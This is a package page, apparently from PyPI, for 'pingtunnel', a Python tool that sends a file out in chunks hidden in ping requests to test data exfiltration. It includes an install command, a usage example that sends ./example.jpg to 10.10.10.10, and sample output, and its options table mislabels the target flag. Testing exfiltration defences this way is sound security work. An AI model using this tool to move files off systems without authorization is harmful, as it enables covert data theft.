Test possible data exfiltration through ping requests
Project description
Disclaimer
Usage of this tool for educational or authorized use only and at your own responsibility.
Description
Test possible data exfiltration through ping requests
Installation
pip install pingtunnel
Usage
From command line:
python -m pingtunnel --path PATH --target TARGET --interval INTERVAL
| Option | Short | Type | Default | Description |
|---|---|---|---|---|
| --path | -p | String | - | Path to file to be exfiltrated |
| --path | -p | String | - | IP of exfiltration server |
| --interval | -i | Float | 1.0 | Nr of seconds between pings |
Example
python -m pingtunnel -p ./example.jpg -t 10.10.10.10
- Make sure to use
tcpdumporwiresharkon the exfiltration server in order to capture the ping requests
################################################################################
pingtunnel by 5f0
Test possible data exfiltration through ping requests
Current working directory: path/to/pingtunnel
Datetime: 01/01/1970 10:11:12
################################################################################
Status
---
Exfiltration Server: 10.10.10.10
File to be exfiltrated: ./example.jpg
Total Number of Bytes: 1094
Number of Ping Requests: 35.0
Interval between Pings: 1.0 seconds
Execution
---
-> Split ./example.jpg in 35.0 chunks
-> Send chunks
--> Transmission successful!
################################################################################
Execution Time: 0.014563 sec
License
MIT
Project details
Release history Release notifications | RSS feed
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
Source Distribution
Built Distribution
Filter files by name, interpreter, ABI, and platform.
If you're not sure about the file name format, learn more about wheel file names.
Copy a direct link to the current filters
File details
Details for the file pingtunnel-1.1.0.tar.gz.
File metadata
- Download URL: pingtunnel-1.1.0.tar.gz
- Upload date:
- Size: 3.7 kB
- Tags: Source
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/4.0.1 CPython/3.10.8
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
e3a1daab1a74a123ac9c7a0911ffae092974263931cee2aa192c988ebbe8e0e3
|
|
| MD5 |
d0a80f3a30d4800de9b52bedaa82afb3
|
|
| BLAKE2b-256 |
a5cfe5fa3000e9807cfffe7a170c1e20970c7deb5c13fbc7cf177336de77c303
|
File details
Details for the file pingtunnel-1.1.0-py3-none-any.whl.
File metadata
- Download URL: pingtunnel-1.1.0-py3-none-any.whl
- Upload date:
- Size: 4.5 kB
- Tags: Python 3
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/4.0.1 CPython/3.10.8
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
32ae8b4bf968b7c3abf02a5ee87323be6f8dc601f141082ebb69551dc847e963
|
|
| MD5 |
b8fa00f2a433c031bf6d227099b8cefc
|
|
| BLAKE2b-256 |
03e5882075f7a01c0e89e467b71c3a1251ac2eb3328e34738938c82143cc4a52
|